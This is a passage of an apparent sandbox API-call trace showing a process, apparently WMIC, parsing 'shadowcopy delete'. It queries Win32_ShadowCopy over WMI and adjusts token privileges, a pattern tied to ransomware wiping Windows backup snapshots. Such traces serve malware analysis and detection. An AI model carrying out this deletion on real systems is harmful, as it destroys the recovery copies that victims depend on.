(Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0043.372] lstrlenW (lpString="-") returned 1 [0043.372] lstrlenW (lpString="shadowcopy") returned 10 [0043.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0043.372] lstrlenW (lpString="CLASS") returned 5 [0043.372] lstrlenW (lpString="shadowcopy") returned 10 [0043.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0043.372] lstrlenW (lpString="PATH") returned 4 [0043.372] lstrlenW (lpString="shadowcopy") returned 10 [0043.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0043.372] lstrlenW (lpString="CONTEXT") returned 7 [0043.372] lstrlenW (lpString="shadowcopy") returned 10 [0043.372] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0043.372] lstrlenW (lpString="shadowcopy") returned 10 [0043.372] malloc (_Size=0x16) returned 0x409640 [0043.372] lstrlenW (lpString="shadowcopy") returned 10 [0043.373] GetCurrentThreadId () returned 0xb54 [0043.373] ??0CHString@@QEAA@XZ () returned 0xff930 [0043.373] malloc (_Size=0x18) returned 0x409660 [0043.373] malloc (_Size=0x18) returned 0x409680 [0043.373] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e31390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff452998 | out: ppNamespace=0xff452998*=0x1e43a98) returned 0x0 [0043.893] free (_Block=0x409680) [0043.893] free (_Block=0x409660) [0043.893] CoSetProxyBlanket (pProxy=0x1e43a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0043.893] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0043.893] GetCurrentThreadId () returned 0xb54 [0043.893] ??0CHString@@QEAA@XZ () returned 0xff7c8 [0043.894] malloc (_Size=0x18) returned 0x409660 [0043.894] malloc (_Size=0x18) returned 0x409680 [0043.894] malloc (_Size=0x18) returned 0x4096a0 [0043.894] malloc (_Size=0x18) returned 0x4096c0 [0043.894] SysStringLen (param_1="root\\cli") returned 0x8 [0043.894] SysStringLen (param_1="\\") returned 0x1 [0043.894] malloc (_Size=0x18) returned 0x4096e0 [0043.894] SysStringLen (param_1="root\\cli\\") returned 0x9 [0043.894] SysStringLen (param_1="ms_409") returned 0x6 [0043.894] free (_Block=0x4096c0) [0043.894] free (_Block=0x4096a0) [0043.894] free (_Block=0x409680) [0043.894] free (_Block=0x409660) [0043.894] malloc (_Size=0x18) returned 0x409660 [0043.894] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e31390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff4529a0 | out: ppNamespace=0xff4529a0*=0x1e43b28) returned 0x0 [0043.914] free (_Block=0x409660) [0043.914] free (_Block=0x4096e0) [0043.914] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0043.914] GetCurrentThreadId () returned 0xb54 [0043.914] ??0CHString@@QEAA@XZ () returned 0xff940 [0043.914] malloc (_Size=0x18) returned 0x4096e0 [0043.914] malloc (_Size=0x18) returned 0x409660 [0043.914] malloc (_Size=0x18) returned 0x409680 [0043.914] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0043.914] malloc (_Size=0x3a) returned 0x40ca40 [0043.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3e1980, cbMultiByte=-1, lpWideCharStr=0x40ca40, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0043.914] free (_Block=0x40ca40) [0043.914] malloc (_Size=0x18) returned 0x4096a0 [0043.914] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0043.914] SysStringLen (param_1="shadowcopy") returned 0xa [0043.914] malloc (_Size=0x18) returned 0x4096c0 [0043.914] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0043.914] SysStringLen (param_1="'") returned 0x1 [0043.915] free (_Block=0x4096a0) [0043.915] free (_Block=0x409680) [0043.915] free (_Block=0x409660) [0043.915] free (_Block=0x4096e0) [0043.915] IWbemServices:GetObject (in: This=0x1e43a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0xff948*=0x0, ppCallResult=0x0 | out: ppObject=0xff948*=0x1e504e0, ppCallResult=0x0) returned 0x0 [0043.927] malloc (_Size=0x18) returned 0x4096e0 [0043.927] IWbemClassObject:Get (in: This=0x1e504e0, wszName="Target", lFlags=0, pVal=0xff870*(varType=0x0, wReserved1=0xff45, wReserved2=0x0, wReserved3=0x0, varVal1=0xff452998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xff870*(varType=0x8, wReserved1=0xff45, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0043.927] free (_Block=0x4096e0) [0043.927] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0043.927] malloc (_Size=0x3e) returned 0x40ca40 [0043.928] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0043.928] malloc (_Size=0x18) returned 0x4096e0 [0043.928] IWbemClassObject:Get (in: This=0x1e504e0, wszName="PWhere", lFlags=0, pVal=0xff870*(varType=0x0, wReserved1=0xff45, wReserved2=0x0, wReserved3=0x0, varVal1=0x21e068, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xff870*(varType=0x8, wReserved1=0xff45, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0043.928] free (_Block=0x4096e0) [0043.928] lstrlenW (lpString=" Where ID = '#'") returned 15 [0043.928] malloc (_Size=0x20) returned 0x406dc0 [0043.928] lstrlenW (lpString=" Where ID = '#'") returned 15 [0043.928] malloc (_Size=0x18) returned 0x4096e0 [0043.928] IWbemClassObject:Get (in: This=0x1e504e0, wszName="Connection", lFlags=0, pVal=0xff870*(varType=0x0, wReserved1=0xff45, wReserved2=0x0, wReserved3=0x0, varVal1=0x26d7f8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xff870*(varType=0xd, wReserved1=0xff45, wReserved2=0x0, wReserved3=0x0, varVal1=0x1e509c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0043.928] free (_Block=0x4096e0) [0043.928] IUnknown:QueryInterface (in: This=0x1e509c0, riid=0xff3e7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xff860 | out: ppvObject=0xff860*=0x1e509c0) returned 0x0 [0043.928] GetCurrentThreadId () returned 0xb54 [0043.928] ??0CHString@@QEAA@XZ () returned 0xff788 [0043.928] malloc (_Size=0x18) returned 0x4096e0 [0043.928] IWbemClassObject:Get (in: This=0x1e509c0, wszName="Namespace", lFlags=0, pVal=0xff7b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff3f738f, varVal2=0x4096e0), pType=0x0, plFlavor=0x0 | out: pVal=0xff7b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x4096e0), pType=0x0, plFlavor=0x0) returned 0x0 [0043.928] free (_Block=0x4096e0) [0043.928] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0043.928] malloc (_Size=0x16) returned 0x4096e0 [0043.928] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0043.928] malloc (_Size=0x18) returned 0x409660 [0043.929] IWbemClassObject:Get (in: This=0x1e509c0, wszName="Locale", lFlags=0, pVal=0xff7b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bf28, varVal2=0x4096e0), pType=0x0, plFlavor=0x0 | out: pVal=0xff7b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x4096e0), pType=0x0, plFlavor=0x0) returned 0x0 [0043.929] free (_Block=0x409660) [0043.929] lstrlenW (lpString="ms_409") returned 6 [0043.929] malloc (_Size=0xe) returned 0x409660 [0043.929] lstrlenW (lpString="ms_409") returned 6 [0043.929] malloc (_Size=0x18) returned 0x409680 [0043.929] IWbemClassObject:Get (in: This=0x1e509c0, wszName="User", lFlags=0, pVal=0xff7b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bf28, varVal2=0x4096e0), pType=0x0, plFlavor=0x0 | out: pVal=0xff7b0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bf28, varVal2=0x4096e0), pType=0x0, plFlavor=0x0) returned 0x0 [0043.929] free (_Block=0x409680) [0043.929] malloc (_Size=0x18) returned 0x409680 [0043.929] IWbemClassObject:Get (in: This=0x1e509c0, wszName="Password", lFlags=0, pVal=0xff7b0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bf28, varVal2=0x4096e0), pType=0x0, plFlavor=0x0 | out: pVal=0xff7b0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bf28, varVal2=0x4096e0), pType=0x0, plFlavor=0x0) returned 0x0 [0043.929] free (_Block=0x409680) [0043.929] malloc (_Size=0x18) returned 0x409680 [0043.929] IWbemClassObject:Get (in: This=0x1e509c0, wszName="Server", lFlags=0, pVal=0xff7b0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bf28, varVal2=0x4096e0), pType=0x0, plFlavor=0x0 | out: pVal=0xff7b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x4096e0), pType=0x0, plFlavor=0x0) returned 0x0 [0043.929] free (_Block=0x409680) [0043.929] lstrlenW (lpString=".") returned 1 [0043.929] malloc (_Size=0x4) returned 0x40ca90 [0043.929] lstrlenW (lpString=".") returned 1 [0043.929] malloc (_Size=0x18) returned 0x409680 [0043.929] IWbemClassObject:Get (in: This=0x1e509c0, wszName="Authority", lFlags=0, pVal=0xff7b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bf28, varVal2=0x4096e0), pType=0x0, plFlavor=0x0 | out: pVal=0xff7b0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bf28, varVal2=0x4096e0), pType=0x0, plFlavor=0x0) returned 0x0 [0043.929] free (_Block=0x409680) [0043.929] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0043.929] IUnknown:Release (This=0x1e509c0) returned 0x1 [0043.930] GetCurrentThreadId () returned 0xb54 [0043.930] ??0CHString@@QEAA@XZ () returned 0xff788 [0043.930] malloc (_Size=0x18) returned 0x409680 [0043.930] IWbemClassObject:Get (in: This=0x1e504e0, wszName="__RELPATH", lFlags=0, pVal=0xff7b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29bf28, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0xff7b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0043.930] free (_Block=0x409680) [0043.930] malloc (_Size=0x18) returned 0x409680 [0043.930] GetCurrentThreadId () returned 0xb54 [0043.930] ??0CHString@@QEAA@XZ () returned 0xff608 [0043.930] ??0CHString@@QEAA@PEBG@Z () returned 0xff620 [0043.930] ??0CHString@@QEAA@AEBV0@@Z () returned 0xff5b0 [0043.930] ?Empty@CHString@@QEAAXXZ () returned 0x7fef873482c [0043.930] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x40cab0 [0043.930] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0043.930] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xff570 [0043.931] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xff5b8 [0043.931] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xff620 [0043.932] ??1CHString@@QEAA@XZ () returned 0x49f6ad01 [0043.932] ??1CHString@@QEAA@XZ () returned 0x49f6ad01 [0043.932] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xff578 [0043.932] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xff5b0 [0043.932] ??1CHString@@QEAA@XZ () returned 0x1 [0043.932] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x40cb20 [0043.932] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0043.932] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xff570 [0043.932] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xff5b8 [0043.932] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xff620 [0043.932] ??1CHString@@QEAA@XZ () returned 0x49f6ad01 [0043.932] ??1CHString@@QEAA@XZ () returned 0x49f6ad01 [0043.932] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xff578 [0043.932] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xff5b0 [0043.932] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0043.932] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef8734820 [0043.932] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0043.932] malloc (_Size=0x18) returned 0x4096a0 [0043.932] malloc (_Size=0x18) returned 0x409700 [0043.933] malloc (_Size=0x18) returned 0x409720 [0043.933] malloc (_Size=0x18) returned 0x409740 [0043.933] malloc (_Size=0x18) returned 0x409760 [0043.933] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0043.933] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0043.933] malloc (_Size=0x18) returned 0x409780 [0043.933] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0043.933] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0043.933] malloc (_Size=0x18) returned 0x4097a0 [0043.933] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0043.933] SysStringLen (param_1="\"") returned 0x1 [0043.933] free (_Block=0x409780) [0043.933] free (_Block=0x409760) [0043.933] free (_Block=0x409740) [0043.933] free (_Block=0x409720) [0043.933] free (_Block=0x409700) [0043.933] free (_Block=0x4096a0) [0043.933] IWbemServices:GetObject (in: This=0x1e43b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xff5f8*=0x0, ppCallResult=0x0 | out: ppObject=0xff5f8*=0x1e50a50, ppCallResult=0x0) returned 0x0 [0043.937] malloc (_Size=0x18) returned 0x4096a0 [0043.937] IWbemClassObject:Get (in: This=0x1e50a50, wszName="Text", lFlags=0, pVal=0xff630*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff452ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0xff630*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x296320*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x21de00, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0043.937] free (_Block=0x4096a0) [0043.937] SafeArrayGetLBound (in: psa=0x296320, nDim=0x1, plLbound=0xff610 | out: plLbound=0xff610) returned 0x0 [0043.937] SafeArrayGetUBound (in: psa=0x296320, nDim=0x1, plUbound=0xff600 | out: plUbound=0xff600) returned 0x0 [0043.937] SafeArrayGetElement (in: psa=0x296320, rgIndices=0xff5f4, pv=0xff648 | out: pv=0xff648) returned 0x0 [0043.937] malloc (_Size=0x18) returned 0x4096a0 [0043.937] malloc (_Size=0x18) returned 0x409700 [0043.937] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0043.937] free (_Block=0x4096a0) [0043.937] IUnknown:Release (This=0x1e50a50) returned 0x0 [0043.937] free (_Block=0x4097a0) [0043.937] ??1CHString@@QEAA@XZ () returned 0x49f6ad01 [0043.937] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0043.937] free (_Block=0x409680) [0043.937] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0043.937] lstrlenW (lpString="Shadow copy management.") returned 23 [0043.937] malloc (_Size=0x30) returned 0x408640 [0043.937] lstrlenW (lpString="Shadow copy management.") returned 23 [0043.937] free (_Block=0x409700) [0043.938] IUnknown:Release (This=0x1e504e0) returned 0x0 [0043.938] free (_Block=0x4096c0) [0043.938] ??1CHString@@QEAA@XZ () returned 0x7fef873482c [0043.938] lstrlenW (lpString="PATH") returned 4 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0043.938] lstrlenW (lpString="WHERE") returned 5 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0043.938] lstrlenW (lpString="(") returned 1 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0043.938] lstrlenW (lpString="/") returned 1 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0043.938] lstrlenW (lpString="-") returned 1 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0043.938] malloc (_Size=0x18) returned 0x4096c0 [0043.938] lstrlenW (lpString="GET") returned 3 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0043.938] lstrlenW (lpString="LIST") returned 4 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0043.938] lstrlenW (lpString="SET") returned 3 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0043.938] lstrlenW (lpString="CREATE") returned 6 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.938] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0043.938] lstrlenW (lpString="CALL") returned 4 [0043.938] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0043.939] lstrlenW (lpString="ASSOC") returned 5 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0043.939] lstrlenW (lpString="DELETE") returned 6 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0043.939] free (_Block=0x4096c0) [0043.939] lstrlenW (lpString="/") returned 1 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0043.939] lstrlenW (lpString="-") returned 1 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] malloc (_Size=0xe) returned 0x4096c0 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] lstrlenW (lpString="GET") returned 3 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0043.939] lstrlenW (lpString="LIST") returned 4 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0043.939] lstrlenW (lpString="SET") returned 3 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0043.939] lstrlenW (lpString="CREATE") returned 6 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0043.939] lstrlenW (lpString="CALL") returned 4 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0043.939] lstrlenW (lpString="ASSOC") returned 5 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.939] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0043.939] lstrlenW (lpString="DELETE") returned 6 [0043.939] lstrlenW (lpString="delete") returned 6 [0043.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0043.940] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0043.940] malloc (_Size=0x3e) returned 0x40cab0 [0043.940] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0043.940] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff90 | out: _String="Select", _Context=0xffffffffffffff90) returned="Select" [0043.940] malloc (_Size=0x18) returned 0x409700 [0043.940] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0043.940] lstrlenW (lpString="FROM") returned 4 [0043.940] lstrlenW (lpString="*") returned 1 [0043.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0043.940] malloc (_Size=0x18) returned 0x409680 [0043.940] free (_Block=0x409700) [0043.940] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53009a007c0006 | out: _String=0x0, _Context=0x53009a007c0006) returned="from" [0043.940] lstrlenW (lpString="FROM") returned 4 [0043.940] lstrlenW (lpString="from") returned 4 [0043.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0043.940] malloc (_Size=0x18) returned 0x409700 [0043.940] free (_Block=0x409680) [0043.940] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53009b007c0006 | out: _String=0x0, _Context=0x53009b007c0006) returned="Win32_ShadowCopy" [0043.940] malloc (_Size=0x18) returned 0x409680 [0043.940] free (_Block=0x409700) [0043.940] free (_Block=0x40cab0) [0043.940] free (_Block=0x409680) [0043.940] lstrlenW (lpString="SET") returned 3 [0043.940] lstrlenW (lpString="delete") returned 6 [0043.940] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0043.940] lstrlenW (lpString="CREATE") returned 6 [0043.940] lstrlenW (lpString="delete") returned 6 [0043.941] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0043.941] free (_Block=0x4095c0) [0043.941] malloc (_Size=0x8) returned 0x40cab0 [0043.941] lstrlenW (lpString="GET") returned 3 [0043.941] lstrlenW (lpString="delete") returned 6 [0043.941] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0043.941] lstrlenW (lpString="LIST") returned 4 [0043.941] lstrlenW (lpString="delete") returned 6 [0043.941] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0043.941] lstrlenW (lpString="ASSOC") returned 5 [0043.941] lstrlenW (lpString="delete") returned 6 [0043.941] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0043.941] WbemLocator:IUnknown:AddRef (This=0x1e31390) returned 0x3 [0043.941] free (_Block=0x2fdfb0) [0043.941] lstrlenW (lpString="") returned 0 [0043.941] lstrlenW (lpString="XDUWTFONO") returned 9 [0043.941] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0043.941] lstrlenW (lpString="XDUWTFONO") returned 9 [0043.941] malloc (_Size=0x14) returned 0x4095c0 [0043.941] lstrlenW (lpString="XDUWTFONO") returned 9 [0043.941] GetCurrentThreadId () returned 0xb54 [0043.941] GetCurrentProcess () returned 0xffffffffffffffff [0043.941] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xff9d0 | out: TokenHandle=0xff9d0*=0x27c) returned 1 [0043.941] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xff9c8 | out: TokenInformation=0x0, ReturnLength=0xff9c8) returned 0 [0043.941] malloc (_Size=0x118) returned 0x40cad0 [0043.941] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x40cad0, TokenInformationLength=0x118, ReturnLength=0xff9c8 | out: TokenInformation=0x40cad0, ReturnLength=0xff9c8) returned 1 [0043.941] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x40cad0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1962323456, Attributes=0xd46b), (Luid.LowPart=0x0, Luid.HighPart=3137456, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=1056965436, Attributes=0xd47c), (Luid.LowPart=0x0, Luid.HighPart=4194648, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0043.941] free (_Block=0x40cad0) [0043.941] CloseHandle (hObject=0x27c) returned 1 [0043.941] 